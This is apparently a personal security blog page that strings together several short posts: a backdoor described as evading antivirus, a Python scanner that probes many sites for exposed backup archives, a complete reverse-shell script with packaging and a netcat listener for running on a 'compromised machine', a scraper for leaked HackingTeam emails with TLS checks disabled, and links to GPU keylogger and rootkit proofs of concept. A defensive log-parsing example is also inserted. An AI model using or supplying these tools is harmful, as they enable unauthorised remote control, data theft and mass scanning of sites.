AZ0NE

About me

Cybersecurity enthusiast

https://github.com/az0ne/simple_zoomeye

When I first built this, collecting the data with Python was a long process: it took about a month end to end and used three Alibaba Cloud servers. To keep the data accurate I did not run large-scale scans but scanned automatically in segments. This is the V1 version, built on PHP + MySQL, and its performance is not particularly good; V2, which will cover all ports worldwide, will use a Flask + MongoDB + Elasticsearch architecture to improve search performance.

Very often, when you need a trojan, things get awkward: either it gets flagged by antivirus, or you simply do not need that many features, perhaps only file download, or collecting files of a certain type. So I put together one that only does upload, download and searching for a specified file extension. Not much more to say; the code is on GitHub for everyone to look at.

https://github.com/az0ne/python_backdoor

AV evasion results:



Install it directly with pip:

pip install arachnado

Run arachnado.

Open a browser and visit http://0.0.0.0:8888/

The interface is very friendly.



Many of you have probably used the legendary "Wajueji" (挖掘鸡) from Mafengwo (马蜂窝). It was hugely popular back then as a tool for batch-scanning sites for source code backups, but many of those tools no longer work, so I wrote one in Python for fun.

First, save the URLs you have collected in host.txt in the script's directory, preferably as complete URLs.

While testing I ran into a problem: some sites have anti-crawler protection that auto-redirects, so the code only reports source archive files larger than 1 MB.

GitHub address: https://github.com/az0ne/digger

__author__ = 'AZONE'
import Queue
import urllib2
from threading import Thread
import sys
import httplib
import urlparse


def bThread(taget):
    # Put every host on a queue and drain it with a fixed pool of worker threads.
    SETTHREAD = 800
    print '[Note] Running...\n'
    threadl = []
    queue = Queue.Queue()
    hosts = taget
    for host in hosts:
        queue.put(host)

    threadl = [tThread(queue) for x in xrange(0, int(SETTHREAD))]
    for t in threadl:
        t.start()
    for t in threadl:
        t.join()


class tThread(Thread):

    def __init__(self, queue):
        Thread.__init__(self)
        self.queue = queue

    def run(self):
        # Each worker takes hosts until the queue is empty; any failure moves on to the next host.
        while not self.queue.empty():
            host = self.queue.get()
            try:
                #print host+":"+PORT1
                requesturl(host)
            except:
                continue


# Read the target list from host.txt; lines without a scheme get http:// prepended.
taget = []
fd = file("host.txt", "r")
for line in fd.readlines():
    if line[0:4] == "http":
        taget.append(line.strip() + "/")
    else:
        taget.append("http://" + line.strip() + "/")
print taget
print "[Note] Thread:800"
dirs = ["wwwroot.zip","wwwroot.rar","www.rar","www.zip","web.rar","web.zip","db.rar","db.zip","wz.rar","wz.zip","fdsa.rar","fdsa.zip","wangzhan.rar","wangzhan.zip","root.rar","root.zip","admin.rar","admin.zip","data.rar","gg.rar","vip.rar","1.zip","1.rar","2.zip","2.rar","config.rar","config.zip","/config/config.rar","/config/config.zip"]


def requesturl(taget):
    for i in range(29):
        TURL = taget + dirs[i]
        request = urllib2.Request(TURL)
        try:
            response = urllib2.urlopen(request)
            back = response.read()
            #print "[%d] => %s" %(response.code,TURL)
            response.close()
            # Second request to read the Content-Length header; only files over 1 MB are
            # reported (see the note above about anti-crawler redirects).
            parsedurl = urlparse.urlparse(TURL)
            httpConn = httplib.HTTPConnection(parsedurl[1])
            httpConn.request('GET', parsedurl[2])
            responsed = httpConn.getresponse()
            if responsed.status == 200:
                size = responsed.getheader('Content-Length')
                size = int(size) / 1024
                if size > 1024:
                    print TURL + '\n'
                    print 'Size: %s KB' % size

        except urllib2.HTTPError as error:
            #print TURL+"ERROR!"
            pass

bThread(taget)
sys.exit()
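From the defender's side, as an added example that is not the author's code: the scanner above requests a fixed list of archive names, which leaves a recognisable pattern in a web server's access log. This Python 3 script parses combined-format log lines (constructed here, with documentation-range IPs) and flags clients that probe several of those names, plus any archive that was actually served with a body over 1 MB, the same threshold the scanner uses.

```python
import re
from collections import defaultdict

# Archive names probed by the digger script above (subset of its dirs list).
PROBED_ARCHIVES = {"wwwroot.zip", "wwwroot.rar", "www.rar", "www.zip", "web.rar",
                   "web.zip", "db.rar", "db.zip", "root.rar", "root.zip", "admin.rar",
                   "admin.zip", "data.rar", "1.zip", "1.rar", "config.rar", "config.zip"}

# Combined log format: ip ident user [time] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

def parse_line(line):
    # Return a dict for one access-log line, or None if it does not parse.
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec

def find_backup_probes(lines, threshold=5, min_size=1024 * 1024):
    """Flag clients probing >= threshold archive names; list archives actually served over min_size."""
    hits = defaultdict(set)
    exposed = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        name = rec["path"].rsplit("/", 1)[-1].lower()
        if name not in PROBED_ARCHIVES:
            continue
        hits[rec["ip"]].add(name)
        if rec["status"] == 200 and rec["size"] > min_size:
            exposed.append((rec["ip"], rec["path"], rec["size"]))
    probers = {ip: sorted(n) for ip, n in hits.items() if len(n) >= threshold}
    return probers, exposed

# Constructed sample log lines (documentation-range IPs, not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jul/2015:10:01:01 +0800] "GET /wwwroot.zip HTTP/1.1" 200 2097152 "-" "Python-urllib/2.7"
203.0.113.5 - - [10/Jul/2015:10:01:01 +0800] "GET /wwwroot.rar HTTP/1.1" 404 209 "-" "Python-urllib/2.7"
203.0.113.5 - - [10/Jul/2015:10:01:02 +0800] "GET /www.rar HTTP/1.1" 404 209 "-" "Python-urllib/2.7"
203.0.113.5 - - [10/Jul/2015:10:01:02 +0800] "GET /db.zip HTTP/1.1" 404 209 "-" "Python-urllib/2.7"
203.0.113.5 - - [10/Jul/2015:10:01:03 +0800] "GET /admin.rar HTTP/1.1" 404 209 "-" "Python-urllib/2.7"
198.51.100.7 - - [10/Jul/2015:10:02:05 +0800] "GET /downloads/1.zip HTTP/1.1" 200 30000 "-" "Mozilla/5.0"
""".splitlines()
```

A single hit from a browser on a real download (the last line) stays below the threshold, while the 200 on wwwroot.zip with a 2 MB body is the finding to act on: the archive is reachable and should be removed from the web root.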

360 (antivirus) does not flag it.

# -*- coding: utf-8 -*-
__author__ = 'AZONE'
import subprocess, socket
HOST = '服务器ip'
PORT = 443
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.send('Hello !')
while 1:
    data = s.recv(1024)
    if data == "quit": break
    proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    stdoutput = proc.stdout.read() + proc.stderr.read()
    s.send(stdoutput)
s.send('Bye !')
s.close()

Package it into an exe with PyInstaller: PyInstaller -F -w shell.py

Listen on the server with netcat: netcat -l -p 443

Run the generated exe on the compromised machine.

Every country has its own take on the Lolita story.

US Lolita:

一树梨花压海棠 (Lolita)


Korean Lolita:

银娇 (Eungyo)



It started because I wanted to download the leaked HackingTeam emails, but the torrents were all unstable and the files too large, so I looked for another way. A site abroad published an online search interface, but unfortunately it is HTTPS and Burp was no help, so I decided to write a script to run through it rather than doing it by hand.

PHP code:

<?php

function curl_https($url, $data = array(), $header = array(), $timeout = 30) {
    $ch = curl_init();
    // Peer certificate verification is turned off here, so the download can be
    // intercepted or altered by anyone on the network path; enabling it needs a CA bundle.
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    // 2 = check that the certificate's name matches the host (1 is not a valid value).
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);

    $response = curl_exec($ch);
    if ($error = curl_error($ch)) {
        die($error);
    }
    curl_close($ch);

    return $response;
}

for ($x = 0; $x <= 111; $x++) {
    $id = "$x";
    $url = "https://wikileaks.org/hackingteam/emails/emailid/{$id}";
    print $url;
    // Fourth argument is the per-request timeout in seconds.
    $response = curl_https($url, array(), array(), 5);

    // Backslashes are doubled so they are literal path separators in a double-quoted string.
    $myF = fopen("D:\\WWW\\https\\data\\{$id}.html", "w");
    fwrite($myF, $response);
    fclose($myF);
}

?>



https://github.com/d0lph1n98/Defeating-PHP-GD-imagecreatefromgif


GPU keylogger PoC by Team Jellyfish

https://github.com/x0r1/Demon

GPU rootkit PoC by Team Jellyfish

https://github.com/x0r1/jellyfish

© AZ0NE | Powered by LOFTER